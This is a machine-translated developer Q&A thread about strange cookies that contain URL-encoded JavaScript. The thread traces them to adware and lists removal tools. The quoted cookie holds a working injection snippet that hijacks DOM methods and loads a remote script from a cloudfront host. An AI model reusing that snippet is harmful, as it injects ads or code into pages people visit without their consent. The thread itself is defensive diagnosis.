2017-07-14 116 views
0

某些客戶端發送請求到我們的web應用額外的餅乾這樣的:外國餅乾請求

vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1; 

我們的應用程序不安裝這種餅乾。我們使用了一些外部JavaScript,如Google Analytics,但這些腳本都沒有這樣做。我們的網站只能通過HTTPS訪問,所以MITM請求修改的可能性不大。

我們使用WAF,這些請求被阻止,客戶端不高興。

我想,一些惡意的瀏覽器擴展正在嘗試利用一些流行的web引擎漏洞。

有沒有人遇到過這樣的事情?任何想法是在做什麼?

P.S.該cookie的URL解碼內容是javascript,其中包含鏈接到http://yieldkit.com/legal-notes/terms-of-service/,但它們可能只是被詐騙者用來通過它們的攻擊獲利。

+0

這些都是XSS餅乾我猜。我真的不知道這個攻擊是誰或是什麼, – Jer

回答

0

找到它。這個惡意軟件會這樣做:http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/(article in russian)和translated with google translate


簡短的摘要:

有一種惡意軟件,創建具有r.srvtrck.com網站的Chrome,Firefox和IE瀏覽器彈出廣告窗口。它也可能將廣告整合到您打開的網站中。

要刪除它,你可以使用:

  • AdwCleaner程序
  • Malwarebytes Anti-malware程序
  • 重置瀏覽器瀏覽器可執行文件設置後添加從站點地址
  • 清晰* .LNK文件
  • AdGuard程序來阻止廣告(我不會建議,只需清除系統並使用AdBlock/uBlock)

建議您檢查Windows任務計劃程序是否有不需要的任務,它會定期啓動帶有惡意軟件站點地址的瀏覽器。

+0

@ andrew-myers,在這裏你走。 –